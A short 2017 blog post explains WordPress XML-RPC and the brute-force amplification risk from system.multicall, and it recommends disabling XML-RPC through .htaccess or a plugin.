Friday, September 8, 2017

XML-RPC- NOTHING FANCY

XML-RPC- Nothing fancy about this post but can be a good read..

This has been in discussion for long on how important is this in the context of worpress security and is the inherent risk is okay to be digested..

XML-RPC is a remote procedure call (RPC) protocol which uses XML to encode its calls and HTTP as a transport mechanism.[1] "XML-RPC" also refers generically to the use of XML for remote procedure call, independently of the specific protocol. This article is about the protocol named "XML-RPC". 

https://en.wikipedia.org/wiki/XML-RPC

There are multiple functionalities that is being used as a part of this XML-RPC.

XML Remote Procedure Call as it is called as is used for providing powers to many of these features in WordPress:

Like if you want to connect to the website using your smartphone

It is used in the context when other sites refer to your site in the form of Trackbacks or pingbacks.

But with respect to this there are also some security issues that popped up. One of them was Brute Force attacks which was because of one of functionality with respect to the system.multicall as this one allows the user(or attacker) to send multiple request on a single command.

One very awesome example was showed by Mr Daniel Cid at Sucuri in 2015: He showcased on how to bypass the blocking mechanism and bruteforce the password with some 3 or 4 HTTP request attempts.

You can read about it here (https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html)

I know this is typical solution but is also the best way which is to turn the XML-RPC off. One of the ways can be adding a deny tag in your .htaccess file or you can also use the DISABLE XML-RPC plugin by wordpress which can be found here (https://wordpress.org/plugins/disable-xml-rpc/)

No comments:

Post a Comment